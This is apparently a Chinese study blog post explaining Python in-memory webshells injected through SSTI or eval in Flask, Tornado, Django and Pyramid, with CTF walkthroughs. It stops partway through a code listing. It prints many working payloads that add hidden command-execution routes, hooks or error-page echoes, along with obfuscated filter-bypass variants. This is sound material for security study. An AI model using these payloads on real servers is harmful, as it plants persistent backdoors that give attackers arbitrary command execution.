Featured image of post python内存马学习

python内存马学习

python内存马学习

常用的Python框架有DjangoFlask, 这两者都可能存在SSTI漏洞. Python 内存马利用Flask框架中SSTI注入来实现, Flask框架中在web应用模板渲染的过程中用到render_template_string进行渲染, 但未对用户传输的代码进行过滤导致用户可以通过注入恶意代码来实现Python内存马的注入.

老版flask内存马

Flask 请求上下文管理机制

当网页请求进入Flask时, 会实例化一个Request Context. 在Python中分出了两种上下文: 请求上下文(request context)、应用上下文(session context). 一个请求上下文中封装了请求的信息, 而上下文的结构是运用了一个Stack的栈结构, 也就是说它拥有一个栈所拥有的全部特性. request context实例化后会被push到栈_request_ctx_stack中, 基于此特性便可以通过获取栈顶元素的方法来获取当前的请求.

漏洞环境

flask写SSTI-demo

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
from flask import Flask, request, render_template_string

app = Flask(__name__)


@app.route('/')
def hello_world():  # put application's code here
    person = 'knave'
    if request.args.get('name'):
        person = request.args.get('name')
    template = '<h1>Hi, %s.</h1>' % person
    return render_template_string(template)


if __name__ == '__main__':
    app.run()

原始Flask内存马Payload:

1
url_for.__globals__['__builtins__']['eval']("app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd', 'whoami')).read())",{'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']})

payload分析

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
url_for.__globals__['__builtins__']['eval'](
    "app.add_url_rule(
        '/shell', 
        'shell', 
        lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd', 'whoami')).read()
    )",
    {
        '_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],
        'app':url_for.__globals__['current_app']
    }
)

url_forFlask的一个内置函数, 通过Flask内置函数可以调用其__globals__属性, 该特殊属性能够返回函数所在模块命名空间的所有变量, 其中包含了很多已经引入的modules, 可以看到这里是支持__builtins__的.

__builtins__模块中, Python在启动时就直接为我们导入了很多内建函数. 准确的说, Python在启动时会首先加载内建名称空间, 内建名称空间中有许多名字到对象之间的映射, 这些名字就是内建函数的名称, 对象就是这些内建函数对象. 可以看到, 在__builtins__模块的内建函数中是存在evalexec等命令执行函数的.

由于存在命令执行函数, 因此我们就可以直接调用命令执行函数来执行危险操作, Exploit如下:

1
{{url_for.__globals__['__builtins__']['eval']("__import__('os').system('open -a Calculator')")}}

接着再来看看app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd', 'whoami')).read())这一截Payload. 这部分是动态添加了一条路由, 而处理该路由的函数是个由lambda关键字定义的匿名函数.

Flask中注册路由的时候是添加的@app.route()装饰器来实现的, 跟进查看其源码实现, 发现其调用了add_url_rule函数来添加路由.

lambda即匿名函数, Payloadadd_url_rule函数的第三个参数定义了一个lambda匿名函数, 其中通过os库的popen函数执行从Web请求中获取的cmd参数值并返回结果, 其中该参数值默认为whoami.

sys.modules

sys.modules是一个全局字典,该字典是python启动后就加载在内存中。每当程序员导入新的模块,sys.modules都将记录这些模块。字典sys.modules对于加载模块起到了缓冲的作用。当某个模块第一次导入,字典sys.modules将自动记录该模块。当第二次再导入该模块时,python会直接到字典中查找,从而加快了程序运行的速度。

所以我们可以通过sys.modules拿到当前已经导入的模块,并且获取模块中的属性,由于我们最终的eval是在app.py中执行的,所以我们可以通过sys.modules['__main__']来获取当前的模块

我们需要在非debug模式下才能成功添加后门路由

1
2
3
import sys
sys.modules['__main__'].__dict__['app'].debug=False
sys.modules['__main__'].__dict__['app'].add_url_rule('/shell','shell',lambda :__import__('os').popen('dir').read())

bypass方法

  • url_for可替换为get_flashed_messages或者request.__init__或者request.application.
  • 代码执行函数替换, 如exec等替换eval.
  • 字符串可采用拼接方式, 如['__builtins__']['eval']变为['__bui'+'ltins__']['ev'+'al'].
  • __globals__可用__getattribute__('__globa'+'ls__')替换.
  • []可用.__getitem__().pop()替换.
  • 过滤{{或者}}, 可以使用{%或者%}绕过, {%%}中间可以执行if语句, 利用这一点可以进行类似盲注的操作或者外带代码执行结果.
  • 过滤_可以用编码绕过, 如__class__替换成\x5f\x5fclass\x5f\x5f, 还可以用dir(0)[0][0]或者request['args']或者request['values']绕过.
  • 过滤了.可以采用attr()[]绕过.
  • 其它的手法参考SSTI绕过过滤的方法即可
1
2
3
4
变形payload
request.application.__self__._get_data_for_json.__getattribute__('__globa'+'ls__').__getitem__('__bui'+'ltins__').__getitem__('ex'+'ec')("app.add_url_rule('/h3rmesk1t', 'h3rmesk1t', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('shell', 'calc')).read())",{'_request_ct'+'x_stack':get_flashed_messages.__getattribute__('__globa'+'ls__').pop('_request_'+'ctx_stack'),'app':get_flashed_messages.__getattribute__('__globa'+'ls__').pop('curre'+'nt_app')})

get_flashed_messages|attr("\x5f\x5fgetattribute\x5f\x5f")("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetattribute\x5f\x5f")("\x5f\x5fgetitem\x5f\x5f")("__builtins__")|attr("\x5f\x5fgetattribute\x5f\x5f")("\x5f\x5fgetitem\x5f\x5f")("\u0065\u0076\u0061\u006c")("app.add_ur"+"l_rule('/h3rmesk1t', 'h3rmesk1t', la"+"mbda :__imp"+"ort__('o"+"s').po"+"pen(_request_c"+"tx_stack.to"+"p.re"+"quest.args.get('shell')).re"+"ad())",{'\u005f\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u005f\u0063\u0074\u0078\u005f\u0073\u0074\u0061\u0063\u006b':get_flashed_messages|attr("\x5f\x5fgetattribute\x5f\x5f")("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetattribute\x5f\x5f")("\x5f\x5fgetitem\x5f\x5f")("\u005f\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u005f\u0063\u0074\u0078\u005f\u0073\u0074\u0061\u0063\u006b"),'app':get_flashed_messages|attr("\x5f\x5fgetattribute\x5f\x5f")("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetattribute\x5f\x5f")("\x5f\x5fgetitem\x5f\x5f")("\u0063\u0075\u0072\u0072\u0065\u006e\u0074\u005f\u0061\u0070\u0070")})

新版flask内存马

参考:新版FLASK下python内存马的研究 - gxngxngxn - 博客园

在最新版本的Flask中,如果直接使用这个payload会发现将抛出一个异常。

但是可以利用@app.before_request @app.after_request方法来打

before_request

我们每次发起请求之前,就会调用这个方法,触发里面定义的函数

里面调用了

1
before_request_funcs.setdefault(None, []).append(f)

然后f就是访问值,也是我们可以自定义的,那么这里只要我们设置f为一个匿名函数,类似之前

1
lambda :__import__('os').popen('whoami').read()

payload

1
eval("__import__('sys').modules['__main__'].__dict__['app'].before_request_funcs.setdefault(None,[]).append(lambda :__import__('os').popen('dir').read())")

after_request

这个是在请求完成后调用,需要注意的是这个是需要定义一个返回值的,不然就报错。

参考这个:Python Flask内存马的另辟途径-先知社区

self.after_request_funcs.setdefault(None, []).append(f)传入的f就是对应的自定义函数,但这里的f需要接收一个response对象,同时返回一个response对象。

但我们仅通过lamba无法对原始传进来的response进行修改后再返回,所以需要重新生成一个response对象,然后再返回这个response。

payload

1
eval("app.after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if request.args.get('cmd') and exec(\"global CmdResp;CmdResp=__import__(\'flask\').make_response(__import__(\'os\').popen(request.args.get(\'cmd\')).read())\")==None else resp)")

还找到了其他钩子函数

errorhandler

这个函数可以用于自定义404页面的回显

跟进register_error_handler函数,

image-20250416215450046

code_or_exception和f就是之前的那两个参数,如果我们绕过上面的register_error_handler函数,对这里的函数进行控制,一样可以达到我们的目的。

codef是我们比较方便可以手动构造的,但是exc_class不太好我们自己构造,我们看到这两个变量是通过_get_exc_class_and_code函数获取的,这个函数的参数code_or_exception就是我们之前传的404,那我们就依靠这个来获取变量值,然后覆写图中这两个函数即可

payload

1
exec("global exc_class;global code;exc_class, code = app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda a:__import__('os').popen(request.args.get('gxngxngxn')).read()")

前面提到新版没办法用老版的payload是会抛出错误

还是利用add_url_rule

回头看add_url_rule函数

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
rule_obj = self.url_rule_class(rule, methods=methods, **options)
    rule_obj.provide_automatic_options = provide_automatic_options

    self.url_map.add(rule_obj)
    if view_func is not None:
        old_func = self.view_functions.get(endpoint)
        if old_func is not None and old_func != view_func:
            raise AssertionError(
                "View function mapping is overwriting an existing"
                f" endpoint function: {endpoint}"
            )
        self.view_functions[endpoint] = view_func

发现在函数末尾的处理中,将 rule_obj 对象添加到了 url_map 中,之后将 view_func 作为了 view_functions 字典中 endpoint 键的值,所以理论上来讲,可以通过直接操作这两个变量来完成一次手动的 add_url_rule

url_mapview_functions 的定义如下:

1
2
3
4
url_map_class = Map

self.view_functions: dict[str, ft.RouteCallable] = {}
self.url_map = self.url_map_class(host_matching=host_matching)

漏洞环境

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
from flask import Flask, request

app = Flask(__name__)

@app.route('/')
def calc():
    result = eval(request.args.get('expression'))
    template = '<h2>result: %s!</h2>' % result
    return template

if __name__ == "__main__":
    app.run(debug=True)

eval 场景下,没有办法执行多条代码,所以这里需要发送两条请求来完成操作,当前上下文中可以直接使用 app 对象,构造第一条请求向 url_map 中新增一条 UrlRule

1
app.url_map.add(app.url_rule_class('/flask-shell', methods=['GET'],endpoint='shell'))

这个时候已经可以访问 /flask-shell 路由,但是由于 view_functions 中并不存在路由指定的 endpoint 所以会报错。

之后再构造第二条请求,向 view_functions 中增加对应 endpoint 的实现。

1
app.view_functions.update({'shell': lambda:__import__('os').popen(request_context.top.request.args.get('cmd', 'whoami')).read()})

为了灵活性这里需要http传参来控制执行的命令,但是这里会发现上下文中并不存在 request_context,当前 app 对象中的 request_context 是一个函数。

那么可以通过函数的 __globals__ 属性来获取当前的全局变量字典,在这其中就有需要的 RequestContext 对象。

所以最终payload

1
app.view_functions.update({'shell': lambda:__import__('os').popen(app.request_context.__globals__['request_ctx'].request.args.get('cmd', 'whoami')).read()})

将两条payload发送完成后,即可新增一条任意命令执行的路由 /flask-shell

Tornado

参考:Python Web 内存马多框架植入技术详解 | 天工实验室

漏洞环境

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
import tornado

class MainHandler(tornado.web.RequestHandler):
    def get(self):
        result = eval(self.get_argument('expression'))
        self.write('<h2>result: %s!</h2>' % result)

def make_app():
    return tornado.web.Application([
        (r"/", MainHandler),
    ], debug=True, autoreload=True)

if __name__ == '__main__':
    app = make_app()
    app.listen(5000)
    print("listen: 5000")
    tornado.ioloop.IOLoop.instance().start()

Tornado 的路由一般情况下都会在实例化 tornado.web.Application 的时候传入,最初想到的办法和 flask 相同,考虑是否能找到其中存放路由的列表来直接操作,在阅读 Application 的代码时确实发现在构造函数中存在这样的列表。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
def __init__(
        self,
        handlers: Optional[_RuleList] = None,
        default_host: Optional[str] = None,
        transforms: Optional[List[Type["OutputTransform"]]] = None,
        **settings: Any,
    ) -> None:
        self.wildcard_router = _ApplicationRouter(self, handlers)
        self.default_router = _ApplicationRouter(
                self, [Rule(AnyMatches(), self.wildcard_router)]
        )

发现在 Application 类中存在一个类似于 flaskadd_url_rule 的函数 add_handlers,这个函数用来支持配置虚拟主机,并且在之后会将指定的路由加入当前的路由表中。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
def add_handlers(self, host_pattern: str, host_handlers: _RuleList) -> None:
    """Appends the given handlers to our handler list.

    Host patterns are processed sequentially in the order they were
    added. All matching patterns will be considered.
    """
    host_matcher = HostMatches(host_pattern)
    rule = Rule(host_matcher, _ApplicationRouter(self, host_handlers))

    self.default_router.rules.insert(-1, rule)

    if self.default_host is not None:
     self.wildcard_router.add_rules(
    [(DefaultHostMatches(self, host_matcher.host_pattern), host_handlers)] )
        
def add_rules(self, rules: _RuleList) -> None:
    """Appends new rules to the router.

    :arg rules: a list of Rule instances (or tuples of arguments, which are
    passed to Rule constructor).
    """
    for rule in rules:
        if isinstance(rule, (tuple, list)):
        assert len(rule) in (2, 3, 4)
        if isinstance(rule[0], basestring_type):
            rule = Rule(PathMatches(rule[0]), *rule[1:])
        else:
            rule = Rule(*rule)

    self.rules.append(self.process_rule(rule))

参数构造

首先看到这个函数声明接受两个参数 host_patternhost_handlers,其中 host_pattern 是一个字符串没有什么需要多考虑的,这个场景下直接构造 .* 匹配所有域名即可,而第二个参数 host_handlers 较为复杂一点,类型为 _RuleList,查看一下这个类型定义。

1
2
3
4
5
6
7
8
9
_RuleList = List[
    Union[
        "Rule",
        List[Any],  # Can't do detailed typechecking of lists.
        Tuple[Union[str, "Matcher"], Any],
        Tuple[Union[str, "Matcher"], Any, Dict[str, Any]],
        Tuple[Union[str, "Matcher"], Any, Dict[str, Any], str],
    ]
]

add_rules 中,整个传入的值都会被作为构造参数来实例化一个 Rule 对象,构造函数如下:

1
2
3
4
5
6
7
def __init__(
    self,
    matcher: "Matcher",
    target: Any,
    target_kwargs: Optional[Dict[str, Any]] = None,
    name: Optional[str] = None,
) -> None:

第一个参数类型为 Matcher,如果自己来构造的话会比较麻烦,但是看到 add_rules 中的处理,会判断一次传入值,如果是 tuple 或者 list 并且第一个值是字符串,那么就会调用一次 PathMatches 返回一个 Matcher 对象,所以这里考虑直接传入路由字符串,让系统来做一次自动转换。

接下来考虑路由对应的 handler, 这往往需要是一个 tornado.web.RequestHandler 的子类,那么这里可以直接使用 type 函数来创建一个对应基类的对象,当 type 函数接受三个参数时,第一个参数为类名,第二个参数为基类元组,第三个参数为类属性/方法的字典,函数原型如下:

1
2
@overload
def __init__(self, name: str, bases: tuple[type, ...], dict: dict[str, Any], /, **kwds: Any) -> None: ...

所以使用下面的payload即可创建一个合法 RequestHandler

1
2
3
4
5
6
7
type(
    'ShellHandler',
    (tornado.web.RequestHandler,),
    {
        'get': lambda self: self.write(__import__('os').popen(sef.get_argument('cmd', 'id')).read()) 
    }
)

将所有分析结合起来,即可在当前场景下构造出下面的请求payload。

1
http://127.0.0.1:5000/?expression=self.application.add_handlers('.*', ['/tornado-shell', type('ShellHandler', (tornado.web.RequestHandler,), {'get': lambda self: self.write(__import__('os').popen(self.get_argument('cmd', 'id')).read())})])

之后便可以访问 /tornado-shell 来执行任意系统命令。

Django

漏洞代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
# memshell/urls.py
from django.contrib import admin
from django.urls import path
from .views import calc

urlpatterns = [
    path('admin/', admin.site.urls),
    path('calc', calc)
]

# memshell/views.py
from django.http import HttpResponse

def calc(request):
    result = eval(request.GET.get('expression'))
    return HttpResponse('<h2>result: %s!</h2>' % result)

虽然 Django 的代码结构不太相同,但由于所有路由都定义在 app/urls.py#urlpatterns 中,所以大体思路没有什么差别,首先考虑如何获取到这个列表,然后再进行操作。

Django 中,root app下会有一个 settings.py 文件用于定义应用配置,其中 ROOT_URLCONF 指定了当前应用路由入口,在当前场景下的 ROOT_URLCONF 为:

1
ROOT_URLCONF = 'memshell.urls'

首先考虑如何获取到 settings 这个对象,得益于当前场景下可以使用 request,所以使用其中函数的 __globals__ 属性来获取到当前的全局变量字典,其中就可以找到。

1
/calc?expression=request.get_post.__globals__

找到memshell.settings

import导入就能获取到app

1
/calc?expression=__import__(request.get_post.__globals__["settings"].ROOT_URLCONF)

获取到app就能获取urlpatterns来操作路由列表了

1
/calc?expression=__import__(request.get_post.__globals__["settings"].ROOT_URLCONF).urls.urlpatterns

在路由定义中,每一条路由都会调用 path 函数来进行定义,传入的参数相对也比较简单,就是 路由:函数 的对应,第一个路由参数不需要考虑,传入字符串即可,需要考虑的是如何构造第二个参数,查看 path 函数定义。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
def _path(route, view, kwargs=None, name=None, Pattern=None):
    from django.views import View

    if kwargs is not None and not isinstance(kwargs, dict):
        raise TypeError(
            f"kwargs argument must be a dict, but got {kwargs.__class__.__name__}."
        )
    if isinstance(view, (list, tuple)):
        # For include(...) processing.
        pattern = Pattern(route, is_endpoint=False)
        urlconf_module, app_name, namespace = view
        return URLResolver(
            pattern,
            urlconf_module,
            kwargs,
            app_name=app_name,
            namespace=namespace,
        )
    elif callable(view):
        pattern = Pattern(route, name=name, is_endpoint=True)
        return URLPattern(pattern, view, kwargs, name)
    elif isinstance(view, View):
        view_cls_name = view.__class__.__name__
        raise TypeError(
            f"view must be a callable, pass {view_cls_name}.as_view(), not "
            f"{view_cls_name}()."
        )
    else:
        raise TypeError(
            "view must be a callable or a list/tuple in the case of include()."
        )

其中会发现 view 参数除了判断是否为 View(list, tuple) 之外,还判断了是否是一个可调用对象,那么这里就比较简单了,直接构造一个 lambda 函数即可。

根据之前的分析结果,可以得到下面的构造流程:

  1. 获取app.urlpatterns

    1
    
    __import__(request.get_port.__globals__["settings"].ROOT_URLCONF).urls.urlpatterns
    
  2. 调用path函数,返回一条新路由

    1
    
    __import__('django').urls.path('shell',lambda request: __import__('django').http.HttpResponse(__import__('os').popen(request.GET.get('cmd','id')).read()))
    

    当前场景下需要返回一个 http.HttpResponse,所以需要额外引入 django 来进行调用

  3. 将新路由append到app.urlpatterns中实现内存马

    1
    
    http://localhost:8000/calc?expression=__import__(request.get_port.__globals__["settings"].ROOT_URLCONF).urls.urlpatterns.append(__import__('django').urls.path('shell',lambda request: __import__('django').http.HttpResponse(__import__('os').popen(request.GET.get('cmd','id')).read())))
    

然后访问/shell

pyramid

直接上例题

上来先是弱口令爆破,有验证码

下面用bp插件来爆破

xiapao

使用参考:全网最新、最详细的使用burpsuite验证码识别绕过爆破教程(2023最新)_burpsuite绕过验证码-CSDN博客

填入链接为验证码图片链接,然后开启本地验证码识别服务

然后把验证码位置替换为 @xiapao@1@

最后在把线程设为 1 就能开始爆破了

接下来就是任意文件读取

直接读app.py

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
import jinja2
from pyramid.config import Configurator
from pyramid.httpexceptions import HTTPFound
from pyramid.response import Response
from pyramid.session import SignedCookieSessionFactory
from wsgiref.simple_server import make_server
from Captcha import captcha_image_view, captcha_store
import re
import os

class User:
    def __init__(self, username, password):
        self.username = username
        self.password = password

users = {"admin": User("admin", "123456")}

def root_view(request):
    # 重定向到 /login
    return HTTPFound(location='/login')

def info_view(request):
    # 查看细节内容
    if request.session.get('username') != 'admin':
        return Response("请先登录", status=403)

    file_name = request.params.get('file')
    file_base, file_extension = os.path.splitext(file_name)
    if file_name:
        file_path = os.path.join('/app/static/details/', file_name)
        try:
            with open(file_path, 'r', encoding='utf-8') as f:
                content = f.read()
                print(content)
        except FileNotFoundError:
            content = "文件未找到。"
    else:
        content = "未提供文件名。"

    return {'file_name': file_name, 'content': content, 'file_base': file_base}

def home_view(request):
    # 主路由
    if request.session.get('username') != 'admin':
        return Response("请先登录", status=403)

    detailtxt = os.listdir('/app/static/details/')
    picture_list = [i[:i.index('.')] for i in detailtxt]
    file_contents = {}
    for picture in picture_list:
        with open(f"/app/static/details/{picture}.txt", "r", encoding='utf-8') as f:
            file_contents[picture] = f.read(80)

    return {'picture_list': picture_list, 'file_contents': file_contents}

def login_view(request):
    if request.method == 'POST':
        username = request.POST.get('username')
        password = request.POST.get('password')
        user_captcha = request.POST.get('captcha', '').upper()

        if user_captcha != captcha_store.get('captcha_text', ''):
            return Response("验证码错误,请重试。")
        user = users.get(username)
        if user and user.password == password:
            request.session['username'] = username
            return Response("登录成功!&lt;a href='/home'&gt;点击进入主页&lt;/a&gt;")
        else:
            return Response("用户名或密码错误。")
    return {}

def shell_view(request):
    if request.session.get('username') != 'admin':
        return Response("请先登录", status=403)

    expression = request.GET.get('shellcmd', '')
    blacklist_patterns = [r'.*length.*',r'.*count.*',r'.*[0-9].*',r'.*\..*',r'.*soft.*',r'.*%.*']
    if any(re.search(pattern, expression) for pattern in blacklist_patterns):
        return Response('wafwafwaf')
    try:
        result = jinja2.Environment(loader=jinja2.BaseLoader()).from_string(expression).render({"request": request})
        if result != None:
            return Response('success')
        else:
            return Response('error')
    except Exception as e:
        return Response('error')


def main():
    session_factory = SignedCookieSessionFactory('secret_key')
    with Configurator(session_factory=session_factory) as config:
        config.include('pyramid_chameleon')  # 添加渲染模板
        config.add_static_view(name='static', path='/app/static')
        config.set_default_permission('view')  # 设置默认权限为view

        # 注册路由
        config.add_route('root', '/')
        config.add_route('captcha', '/captcha')
        config.add_route('home', '/home')
        config.add_route('info', '/info')
        config.add_route('login', '/login')
        config.add_route('shell', '/shell')
        # 注册视图
        config.add_view(root_view, route_name='root')
        config.add_view(captcha_image_view, route_name='captcha')
        config.add_view(home_view, route_name='home', renderer='home.pt', permission='view')
        config.add_view(info_view, route_name='info', renderer='details.pt', permission='view')
        config.add_view(login_view, route_name='login', renderer='login.pt')
        config.add_view(shell_view, route_name='shell', renderer='string', permission='view')

        config.scan()
        app = config.make_wsgi_app()
        return app


if __name__ == "__main__":
    app = main()
    server = make_server('0.0.0.0', 6543, app)
    server.serve_forever()

看到shell路由存在ssti漏洞但是无回显

添加路由视图用到 config.add_view,我们可以查看config的所有变量

找到

1
'add_exception_view', 'add_forbidden_view', 'add_notfound_view'

但是config在main函数里面,不是全局变量没法用

pyramid钩子函数

看官方文档use hook:Using Hooks — The Pyramid Web Application Development Framework v1.4.9

发现 request 也存在钩子函数

image-20250420214843414

可以利用request.add_response_callback来构造回显

1
2
request.add_response_callback(lambda request, response: setattr(response, 'text',
__import__('os').popen('whoami').read()))

再套进 exec 方法中

1
2
3
4
5
6
{{cycler.__init__.__globals__.__builtins__['exec']
("request.add_response_callback(lambda request, response: setattr(response,
'text', __import__('os').popen('whoami').read()))",{'request': request})}}
{{x.__init__.__globals__.__builtins__['exec']
("request.add_response_callback(lambda request, response: setattr(response,
'text', __import__('os').popen('whoami').read()))",{'request': request})}}

注意最后的 {'request': request} ,声明 request,因为在 exec 的作用域中没有 request,需要进行 声明,最后得到回显进行命令执行

image-20250420215607082

或者用这个request.add_finished_callback也能打回显

利用header头外带回显

这里参考:wsgiref应用无回显详细调试研究-先知社区

先调试找请求过程

1
2
3
4
5
6
7
8
def process_request(self, request, client_address):
"""Call finish_request.

Overridden by ForkingMixIn and ThreadingMixIn.

"""
self.finish_request(request, client_address)
self.shutdown_request(request)

跟进finish_request

1
2
3
def finish_request(self, request, client_address):
"""Finish one request by instantiating RequestHandlerClass."""
self.RequestHandlerClass(request, client_address, self)

跟进RequestHandlerClass类的handler方法

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
def handle(self):
"""Handle a single HTTP request"""

self.raw_requestline = self.rfile.readline(65537)
if len(self.raw_requestline) > 65536:
    self.requestline = ''
    self.request_version = ''
    self.command = ''
    self.send_error(414)
    return

if not self.parse_request(): # An error code has been sent, just exit
    return

handler = ServerHandler(
    self.rfile, self.wfile, self.get_stderr(), self.get_environ(),
    multithread=False,
)
handler.request_handler = self      # backpointer for logging
handler.run(self.server.get_app())

跟进run方法,看到finish_reponse,继续跟进

1
2
3
4
5
try:
if not self.result_is_file() or not self.sendfile():
    for data in self.result:
        self.write(data)
    self.finish_content()

跟进write,把 data 写入返回的 body 中,然后调用了send_headler,继续跟进

1
2
3
4
5
6
7
def send_headers(self):
"""Transmit headers to the client, via self._write()"""
self.cleanup_headers()
self.headers_sent = True
if not self.origin_server or self.client_is_modern():
    self.send_preamble()
    self._write(bytes(self.headers))

跟进send_preamble

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
def send_preamble(self):
"""Transmit version/status/date/server, via self._write()"""
if self.origin_server:
    if self.client_is_modern():
        self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
        if 'Date' not in self.headers:
            self._write(
                ('Date: %s\r\n' % format_date_time(time.time())).encode('iso-8859-1')
            )
        if self.server_software and 'Server' not in self.headers:
            self._write(('Server: %s\r\n' % self.server_software).encode('iso-8859-1'))
else:
    self._write(('Status: %s\r\n' % self.status).encode('iso-8859-1'))

看到最后的 header 头就是在这里进行的赋值,是每次请求进行的动态赋值,那么可以通过 ssti 将其修改为我们的回显

1
self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))

可以看到 self 是

1
<wsgiref.simple_server.ServerHandler object at 0x00000227DAC28850>

先寻找对象,然后打ssti污染就行了

1
2
先找到wsgiref
{{lipsum.__spec__.__init__.__globals__.sys.modules}}
1
2
找到simple_server
{{lipsum.__spec__.__init__.__globals__.sys.modules.wsgiref.simple_server.__dict__}}
1
2
找到handler
{{lipsum.__spec__.__init__.__globals__.sys.modules.wsgiref.simple_server.ServerHandler}}

然后跟flask一样修改值

1
{{lipsum.__globals__.__builtins__.setattr(lipsum.__spec__.__init__.__globals__.sys.modules.wsgiref.simple_server.ServerHandler,"http_version",lipsum.__globals__.__builtins__.__import__('os').popen('whoami').read())}}

或者还有其他可利用的点

刚刚的send_preamble里面还有可以利用的

1
self._write(('Server: %s\r\n' % self.server_software).encode('iso-8859-1'))

尝试修改

1
{{lipsum.__globals__.__builtins__.setattr(lipsum.__spec__.__init__.__globals__.sys.modules.wsgiref.simple_server.ServerHandler,"server_software",lipsum.__globals__.__builtins__.__import__('os').popen('whoami').read())}}
1
2
3
4
{{cycler.__init__.__globals__.__builtins__['setattr']
(cycler.__init__.__globals__.__builtins__.__import__('sys').modules['wsgiref'].si
mple_server.ServerHandler,'server_software',cycler.__init__.__globals__.__builtin
s__.__import__('os').popen('whoami').read())}}

HTTP错误回显

这里研究最近比赛中别的师傅常用的胁持错误回显界面的内存马

500状态码

当我触发时页面回显如下字段

1
A server error occurred.  Please contact the administrator.

我们从源代码中搜索定位,发现是Basehandler的一个属性error_body

注意error_body类型是bytes类型 ,所以我们可以对read()返回回来的数据实现encode转换

1
2
3
{{lipsum['__globals__']['__builtins__']['setattr']((((lipsum|attr('__spec__'))|attr('__init__')|attr('__globals__'))['sys']|attr('modules'))['wsgiref']|attr('handlers')|attr('BaseHandler'),'error_body',lipsum['__globals__']['__builtins__']['__import__']('os')['popen']('whoami')['read']()['encode']())}}

{{lipsum.__globals__.__builtins__.setattr(lipsum.__spec__.__init__.__globals__.sys.modules.wsgiref.simple_server.ServerHandler,"error_body",lipsum.__globals__.__builtins__.__import__('os').popen('whoami').read())}}

404状态码

根据404回显找到pyramid.httpexceptions.HTTPNotFound类

发现explanation也是bytes类型,污染属性explanation来404回显

1
{{lipsum['__globals__']['__builtins__']['exec']("setattr(Not,'explanation',shell)",{"Not":((lipsum|attr('__spec__')|attr('__init__')|attr('__globals__'))['sys']|attr('modules'))['pyramid']['httpexceptions']['HTTPNotFound'],"shell":lipsum['__globals__']['__builtins__']['__import__']('os')['popen']('whoami')['read']()})}}

或者

1
{{lipsum.__globals__.__builtins__.setattr(lipsum.__spec__.__init__.__globals__.sys.modules.pyramid.httpexceptions.HTTPNotFound,"explanation",lipsum.__globals__.__builtins__.__import__('os').popen('whoami').read())}}

也可以覆盖属性title来回显

1
{{(lipsum['__globals__']['__builtins__']['exec'])("setattr(Not,'title',shell)",{"Not":(((lipsum|attr('__spec__'))|attr('__init__')|attr('__globals__'))['sys']|attr('modules'))['pyramid']['httpexceptions']['HTTPNotFound'],"shell":lipsum['__globals__']['__builtins__']['__import__']('os')['popen']('whoami')['read']()})}}

或者

1
{{lipsum.__globals__.__builtins__.setattr(lipsum.__spec__.__init__.__globals__.sys.modules.pyramid.httpexceptions.HTTPNotFound,"title",lipsum.__globals__.__builtins__.__import__('os').popen('whoami').read())}}

强网杯决赛pyramid

app.py

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
from wsgiref.simple_server import make_server
from pyramid.config import Configurator
from pyramid.events import NewResponse
from pyramid.response import Response
import util

users = []
super_user = ["admin"]
default_alg = "RS"


def register_api(request):
    try:
        username = request.params['username']
        if username in super_user:
            return Response("Not Allowed!")
        password = request.params['password']
    except:
        return Response('Please Input username & password', status="500 Internal Server")
    data = {"username": username, "password": password}
    users.append(data)
    token = util.data_encode(data, default_alg)
    return Response("Here is your token: "+ token)


def register_front(request):
    return Response(util.read_html('register.html'))


def front_test(request):
    return Response(util.read_html('test.html'))


def system_test(request):
    try:
        code = request.params['code']
        token = request.params['token']
        data = util.data_decode(token)
        if data:
            username = data['username']
            print(username)
            if username in super_user:
                print("Welcome super_user!")
            else:
                return Response('Unauthorized', status="401 Unauthorized")
        else:
            return Response('Unauthorized', status="401 Unauthorized")

    except:
        return Response('Please Input code & token')
    print(exec(code))
    return Response("Success!")


if __name__ == '__main__':
    with Configurator() as config:
        config.add_route('register_front', '/')
